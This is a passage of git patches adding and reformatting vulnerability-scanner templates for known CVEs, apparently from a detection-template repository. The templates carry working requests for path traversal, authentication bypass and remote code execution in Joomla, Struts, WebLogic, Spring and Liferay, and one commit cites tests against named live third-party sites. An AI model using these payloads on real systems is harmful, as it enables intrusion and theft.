type: regex part: body - condition: and + regex: + - '
    \*\*\*\*\*\*<\/td>' - type: status status: From 032e06dbe90575d7ab46549884f8ec17e0ecc43f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 21 Aug 2021 07:06:07 +0700 Subject: [PATCH 1778/4083] Create CVE-2010-1345.yaml --- cves/2010/CVE-2010-1345.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1345.yaml diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml new file mode 100644 index 0000000000..814e4ab08a --- /dev/null +++ b/cves/2010/CVE-2010-1345.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1345 + +info: + name: Joomla! Component Cookex Agency CKForms - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15453 + - https://www.cvedetails.com/cve/CVE-2010-1345 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From c26f4563c6270ec31ce569d2659e08bb95721365 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 21 Aug 2021 08:12:36 +0700 Subject: [PATCH 1779/4083] Create CVE-2010-3426.yaml --- cves/2010/CVE-2010-3426.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-3426.yaml diff --git a/cves/2010/CVE-2010-3426.yaml b/cves/2010/CVE-2010-3426.yaml new file mode 100644 index 0000000000..9eece26cbd --- /dev/null +++ b/cves/2010/CVE-2010-3426.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-3426 + +info: + name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/14964 + - https://www.cvedetails.com/cve/CVE-2010-3426 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From b013ef69dfdf9caee1e609d3042ae1b0ca55e938 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 21 Aug 2021 00:42:49 -0400 Subject: [PATCH 1780/4083] Create springboot-threaddump.yaml Testing nuclei -t springboot-threaddump.yaml -u https://folhaponto.cmm.pr.gov.br/ nuclei -t springboot-threaddump.yaml -u https://ctacte.realechile.cl/ --- .../springboot/springboot-threaddump.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 misconfiguration/springboot/springboot-threaddump.yaml diff --git a/misconfiguration/springboot/springboot-threaddump.yaml b/misconfiguration/springboot/springboot-threaddump.yaml new file mode 100644 index 0000000000..60d1a8d12b --- /dev/null +++ b/misconfiguration/springboot/springboot-threaddump.yaml @@ -0,0 +1,36 @@ +id: springboot-threaddump + +info: + name: Detect Springboot Thread Dump page + author: philippedelteil + severity: low + description: The threaddump endpoint provides a thread dump from the application’s JVM. + reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump + tags: springboot + +requests: + - method: GET + path: + - "{{BaseURL}}/threaddump" + - "{{BaseURL}}/actuator/threaddump" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"threads"' + - '"threadName"' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v2+json" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header From 76c9bbee20b2c7bfb0bc1db2a1e2579708de0c7a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 15:53:06 +0530 Subject: [PATCH 1781/4083] minor update --- misconfiguration/springboot/springboot-threaddump.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/misconfiguration/springboot/springboot-threaddump.yaml b/misconfiguration/springboot/springboot-threaddump.yaml index 60d1a8d12b..98db514631 100644 --- a/misconfiguration/springboot/springboot-threaddump.yaml +++ b/misconfiguration/springboot/springboot-threaddump.yaml @@ -13,13 +13,14 @@ requests: path: - "{{BaseURL}}/threaddump" - "{{BaseURL}}/actuator/threaddump" + matchers-condition: and matchers: - type: word part: body words: - - '"threads"' - - '"threadName"' + - '"threads":' + - '"threadName":' condition: and - type: status From 1447a6d3d415bdf509f06819ab2808dcb6fcb7d3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 21 Aug 2021 18:55:11 +0700 Subject: [PATCH 1782/4083] Update and rename network/openssh-username-enumeration.yaml to cves/2018/CVE-2018-15473.yaml --- cves/2018/CVE-2018-15473.yaml | 19 +++ network/openssh-username-enumeration.yaml | 145 ---------------------- 2 files changed, 19 insertions(+), 145 deletions(-) create mode 100644 cves/2018/CVE-2018-15473.yaml delete mode 100644 network/openssh-username-enumeration.yaml diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml new file mode 100644 index 0000000000..2ce1189af5 --- /dev/null +++ b/cves/2018/CVE-2018-15473.yaml @@ -0,0 +1,19 @@ +id: CVE-2018-15473 + +info: + name: OpenSSH Username Enumeration + author: r3dg33k,daffainfo + description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. + severity: low + tags: network,openssh + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + +network: + - host: + - "{{Hostname}}" + - "{{Hostname}}:22" + + matchers: + - type: regex + regex: + - 'SSH-2.0-OpenSSH_[1-7].*' diff --git a/network/openssh-username-enumeration.yaml b/network/openssh-username-enumeration.yaml deleted file mode 100644 index afc5084ca3..0000000000 --- a/network/openssh-username-enumeration.yaml +++ /dev/null @@ -1,145 +0,0 @@ -id: openssh-username-enumeration - -info: - name: OpenSSH 2.3 < 7.7 Detection - author: r3dg33k - severity: medium - tags: network,openssh - description: OpenSSH 2.3 < 7.7 is vulnerable to username enumeration - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - -network: - - host: - - "{{Hostname}}" - - "{{Hostname}}:22" - - matchers: - - type: word - words: - - "SSH-2.0-OpenSSH_7.6" - - "SSH-2.0-OpenSSH_7.6p1" - - "SSH-2.0-OpenSSH_7.5" - - "SSH-2.0-OpenSSH_7.5p1" - - "SSH-2.0-OpenSSH_7.4" - - "SSH-2.0-OpenSSH_7.4p1" - - "SSH-2.0-OpenSSH_7.3" - - "SSH-2.0-OpenSSH_7.3p1" - - "SSH-2.0-OpenSSH_7.2p2" - - "SSH-2.0-OpenSSH_7.2" - - "SSH-2.0-OpenSSH_7.2p1" - - "SSH-2.0-OpenSSH_7.1p2" - - "SSH-2.0-OpenSSH_7.1" - - "SSH-2.0-OpenSSH_7.1p1" - - "SSH-2.0-OpenSSH_7.0" - - "SSH-2.0-OpenSSH_7.0p1" - - "SSH-2.0-OpenSSH_6.9" - - "SSH-2.0-OpenSSH_6.9p1" - - "SSH-2.0-OpenSSH_6.8" - - "SSH-2.0-OpenSSH_6.8p1" - - "SSH-2.0-OpenSSH_6.7" - - "SSH-2.0-OpenSSH_6.7p1" - - "SSH-2.0-OpenSSH_6.6" - - "SSH-2.0-OpenSSH_6.6p1" - - "SSH-2.0-OpenSSH_6.5" - - "SSH-2.0-OpenSSH_6.5p1" - - "SSH-2.0-OpenSSH_6.4" - - "SSH-2.0-OpenSSH_6.4p1" - - "SSH-2.0-OpenSSH_6.3" - - "SSH-2.0-OpenSSH_6.3p1" - - "SSH-2.0-OpenSSH_6.2p2" - - "SSH-2.0-OpenSSH_6.2" - - "SSH-2.0-OpenSSH_6.2p1" - - "SSH-2.0-OpenSSH_6.1" - - "SSH-2.0-OpenSSH_6.1p1" - - "SSH-2.0-OpenSSH_6.0" - - "SSH-2.0-OpenSSH_6.0p1" - - "SSH-2.0-OpenSSH_5.9" - - "SSH-2.0-OpenSSH_5.9p1" - - "SSH-2.0-OpenSSH_5.8p2" - - "SSH-2.0-OpenSSH_5.8" - - "SSH-2.0-OpenSSH_5.8p1" - - "SSH-2.0-OpenSSH_5.7" - - "SSH-2.0-OpenSSH_5.7p1" - - "SSH-2.0-OpenSSH_5.6" - - "SSH-2.0-OpenSSH_5.6p1" - - "SSH-2.0-OpenSSH_5.5" - - "SSH-2.0-OpenSSH_5.5p1" - - "SSH-2.0-OpenSSH_5.4" - - "SSH-2.0-OpenSSH_5.4p1" - - "SSH-2.0-OpenSSH_5.3" - - "SSH-2.0-OpenSSH_5.3p1" - - "SSH-2.0-OpenSSH_5.2" - - "SSH-2.0-OpenSSH_5.2p1" - - "SSH-2.0-OpenSSH_5.1" - - "SSH-2.0-OpenSSH_5.1p1" - - "SSH-2.0-OpenSSH_5.0" - - "SSH-2.0-OpenSSH_5.0p1" - - "SSH-2.0-OpenSSH_4.9" - - "SSH-2.0-OpenSSH_4.9p1" - - "SSH-2.0-OpenSSH_4.8" - - "SSH-2.0-OpenSSH_4.8p1" - - "SSH-2.0-OpenSSH_4.6" - - "SSH-2.0-OpenSSH_4.6p1" - - "SSH-2.0-OpenSSH_4.7" - - "SSH-2.0-OpenSSH_4.7p1" - - "SSH-2.0-OpenSSH_4.5" - - "SSH-2.0-OpenSSH_4.5p1" - - "SSH-2.0-OpenSSH_4.4" - - "SSH-2.0-OpenSSH_4.4p1" - - "SSH-2.0-OpenSSH_4.3p2" - - "SSH-2.0-OpenSSH_4.3" - - "SSH-2.0-OpenSSH_4.3p1" - - "SSH-2.0-OpenSSH_4.2" - - "SSH-2.0-OpenSSH_4.2p1" - - "SSH-2.0-OpenSSH_4.1" - - "SSH-2.0-OpenSSH_4.1p1" - - "SSH-2.0-OpenSSH_4.0" - - "SSH-2.0-OpenSSH_4.0p1" - - "SSH-2.0-OpenSSH_3.9" - - "SSH-2.0-OpenSSH_3.9p1" - - "SSH-2.0-OpenSSH_3.8.1p1" - - "SSH-2.0-OpenSSH_3.8" - - "SSH-2.0-OpenSSH_3.8p1" - - "SSH-2.0-OpenSSH_3.7.1p2" - - "SSH-2.0-OpenSSH_3.7.1" - - "SSH-2.0-OpenSSH_3.7.1p1" - - "SSH-2.0-OpenSSH_3.7" - - "SSH-2.0-OpenSSH_3.7p1" - - "SSH-2.0-OpenSSH_3.6.1p2" - - "SSH-2.0-OpenSSH_3.6.1" - - "SSH-2.0-OpenSSH_3.6.1p1" - - "SSH-2.0-OpenSSH_3.6" - - "SSH-2.0-OpenSSH_3.6p1" - - "SSH-2.0-OpenSSH_3.5" - - "SSH-2.0-OpenSSH_3.5p1" - - "SSH-2.0-OpenSSH_3.4" - - "SSH-2.0-OpenSSH_3.4p1" - - "SSH-2.0-OpenSSH_3.3" - - "SSH-2.0-OpenSSH_3.3p1" - - "SSH-2.0-OpenSSH_3.2.3" - - "SSH-2.0-OpenSSH_3.2.3p1" - - "SSH-2.0-OpenSSH_3.2.2" - - "SSH-2.0-OpenSSH_3.2.2p1" - - "SSH-2.0-OpenSSH_3.1" - - "SSH-2.0-OpenSSH_3.1p1" - - "SSH-2.0-OpenSSH_3.0.2" - - "SSH-2.0-OpenSSH_3.0.2p1" - - "SSH-2.0-OpenSSH_3.0p1" - - "SSH-2.0-OpenSSH_3.0.1" - - "SSH-2.0-OpenSSH_3.0.1p1" - - "SSH-2.0-OpenSSH_3.0" - - "SSH-2.0-OpenSSH_3.0p1" - - "SSH-2.0-OpenSSH_2.9p2" - - "SSH-2.0-OpenSSH_2.9.9" - - "SSH-2.0-OpenSSH_2.9.9p1" - - "SSH-2.0-OpenSSH_2.9" - - "SSH-2.0-OpenSSH_2.9p1" - - "SSH-2.0-OpenSSH_2.5.2p2" - - "SSH-2.0-OpenSSH_2.5.1p2" - - "SSH-2.0-OpenSSH_2.5.1p1" - - "SSH-2.0-OpenSSH_2.3.0p1" - - "SSH-2.0-OpenSSH_2.5.2p2" - - "SSH-2.0-OpenSSH_2.5.1p2" - - "SSH-2.0-OpenSSH_2.5.1p1" - - "SSH-2.0-OpenSSH_2.3.0p1" - - "SSH-2.0-OpenSSH_2.3" \ No newline at end of file From 9cc8cd3353e5c169b3749554360dcce08510bcb2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 21 Aug 2021 18:52:00 +0530 Subject: [PATCH 1783/4083] Update CVE-2018-15473.yaml --- cves/2018/CVE-2018-15473.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml index 2ce1189af5..d13e41671f 100644 --- a/cves/2018/CVE-2018-15473.yaml +++ b/cves/2018/CVE-2018-15473.yaml @@ -3,10 +3,10 @@ id: CVE-2018-15473 info: name: OpenSSH Username Enumeration author: r3dg33k,daffainfo - description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. severity: low - tags: network,openssh + description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + tags: network,openssh,cve,cve2018 network: - host: From 18b7232fd5b7c605081dd527e86b86d19c4a1106 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 22 Aug 2021 09:17:31 +0700 Subject: [PATCH 1784/4083] Create CVE-2010-1718.yaml --- cves/2010/CVE-2010-1718.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1718.yaml diff --git a/cves/2010/CVE-2010-1718.yaml b/cves/2010/CVE-2010-1718.yaml new file mode 100644 index 0000000000..5ebbc5844c --- /dev/null +++ b/cves/2010/CVE-2010-1718.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1718 + +info: + name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12282 + - https://www.cvedetails.com/cve/CVE-2010-1718 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 4c1bc4a615c413aeb148d22e0ed6f36ca6fc932e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 22 Aug 2021 09:24:17 +0700 Subject: [PATCH 1785/4083] Create CVE-2010-1532.yaml --- cves/2010/CVE-2010-1532.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1532.yaml diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml new file mode 100644 index 0000000000..0e8e86595b --- /dev/null +++ b/cves/2010/CVE-2010-1532.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1532 + +info: + name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12118 + - https://www.cvedetails.com/cve/CVE-2010-1532 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From cad976abda4a125268f79613ceec84482a79a4be Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 22 Aug 2021 18:19:34 +0900 Subject: [PATCH 1786/4083] Create commax-biometric-access-control-system-auth-bypass.yaml The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. Signed-off-by: GwanYeong Kim --- ...ric-access-control-system-auth-bypass.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml diff --git a/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml new file mode 100644 index 0000000000..a6afb6744c --- /dev/null +++ b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml @@ -0,0 +1,36 @@ +id: commax-biometric-access-control-system-auth-bypass + +info: + name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass + author: gy741 + severity: critical + description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. + reference: | + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php + tags: commax,auth-bypass + +requests: + - raw: + - | + GET /db_dump.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: {{BaseURL}}/user_add.php + Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "::: COMMAX :::" + - "COMMAX" + condition: or + + - type: word + part: header + words: + - "text/html" From 2aa54304ee925ebba06f7c74d81f92af79361f25 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 22 Aug 2021 23:39:33 +0530 Subject: [PATCH 1787/4083] Payloads positional update to keep the request format uniform --- cves/2013/CVE-2013-2251.yaml | 14 ++++---- cves/2017/CVE-2017-17562.yaml | 19 ++++++----- cves/2018/CVE-2018-1273.yaml | 13 ++++--- cves/2019/CVE-2019-17382.yaml | 13 ++++--- cves/2020/CVE-2020-14882.yaml | 13 ++++--- cves/2020/CVE-2020-23972.yaml | 13 ++++--- cves/2020/CVE-2020-7961.yaml | 13 +++---- .../aem/adobe-aem-default-credentials.yaml | 34 +++++++++---------- .../apache/tomcat-manager-default.yaml | 18 ++++------ default-logins/gitlab/gitlab-weak-login.yaml | 25 +++++++------- .../grafana/grafana-default-credential.yaml | 26 +++++--------- fuzzing/adminer-panel-fuzz.yaml | 15 ++++---- fuzzing/header-command-injection.yaml | 11 +++--- fuzzing/mdb-database-file.yaml | 13 +++---- fuzzing/prestashop-module-fuzz.yaml | 13 ++++--- fuzzing/wordpress-plugins-detect.yaml | 12 +++---- fuzzing/wordpress-themes-detect.yaml | 12 +++---- miscellaneous/ntlm-directories.yaml | 15 ++++---- network/ftp-default-creds.yaml | 14 +++++--- .../gitlab/gitlab-user-enumeration.yaml | 16 ++++----- .../gitlab/gitlab-user-open-api.yaml | 14 ++++---- .../vmware/vmware-vcenter-lfi.yaml | 17 +++++----- 22 files changed, 176 insertions(+), 177 deletions(-) diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index 9cbbb7d652..7351d61bd6 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -9,12 +9,8 @@ info: tags: cve,cve2013,rce,struts,apache requests: - - payloads: - params: - - "redirect" - - "action" - - "redirectAction" - raw: + + - raw: - | GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} @@ -36,6 +32,12 @@ requests: Accept: */* Accept-Language: en + payloads: + params: + - "redirect" + - "action" + - "redirectAction" + matchers-condition: and matchers: - type: status diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 5d46e8977b..808fea6490 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -12,7 +12,16 @@ info: tags: cve,cve2017,rce,embedthis,goahead,fuzz requests: - - payloads: + + - raw: + - | + GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) + Accept: */* + Connection: close + + payloads: endpoint: - admin - apply @@ -79,15 +88,9 @@ requests: - webviewLogin_m64 - webviewer - welcome - raw: - - | - GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) - Accept: */* - Connection: close attack: sniper + matchers-condition: and matchers: - type: status diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index 6094adff33..8c813bb519 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -15,11 +15,8 @@ info: tags: cve,cve2018,vmware,rce requests: - - payloads: - command: - - "cat /etc/passwd" - - "type C:\\/Windows\\/win.ini" - raw: + + - raw: - | POST /account HTTP/1.1 Host: {{Hostname}} @@ -27,6 +24,12 @@ requests: Content-Type: application/x-www-form-urlencoded name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei + + payloads: + command: + - "cat /etc/passwd" + - "type C:\\/Windows\\/win.ini" + matchers: - type: regex regex: diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index c4e52beccf..0a7448f4a0 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -10,19 +10,18 @@ info: requests: - - payloads: - ids: helpers/wordlists/numbers.txt - - attack: sniper - threads: 50 - - raw: + - raw: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept-Language: en-US,en;q=0.9 + payloads: + ids: helpers/wordlists/numbers.txt + attack: sniper + threads: 50 + matchers-condition: and matchers: - type: status diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 4c2e370aa0..6a4b9c9d0f 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -20,11 +20,8 @@ info: tags: cve,cve2020,oracle,rce,weblogic requests: - - payloads: - exec: - - "type C:\\Windows\\win.ini" # Windows - - "cat /etc/passwd" # *nix - raw: + + - raw: - | POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} @@ -33,6 +30,12 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=utf-8 _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 + + payloads: + exec: + - "type C:\\Windows\\win.ini" # Windows + - "cat /etc/passwd" # *nix + matchers-condition: and matchers: - type: regex diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml index 4f5e8e46bf..3d15c318ef 100644 --- a/cves/2020/CVE-2020-23972.yaml +++ b/cves/2020/CVE-2020-23972.yaml @@ -13,11 +13,8 @@ info: tags: cve,cve2020,joomla requests: - - payloads: - component: - - "com_gmapfp" - - "comgmapfp" - raw: + + - raw: - | POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 Host: {{Hostname}} @@ -41,6 +38,12 @@ requests: no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- + + payloads: + component: + - "com_gmapfp" + - "comgmapfp" + extractors: - type: regex part: body diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index e552deef58..4bf22c5771 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -11,13 +11,8 @@ info: - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 requests: - - payloads: - command: - - "systeminfo" # Windows - - "lsb_release -a" # Linux - attack: sniper - raw: + - raw: - | POST /api/jsonws/invoke HTTP/1.1 Host: {{Hostname}} @@ -33,6 +28,12 @@ requests: cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743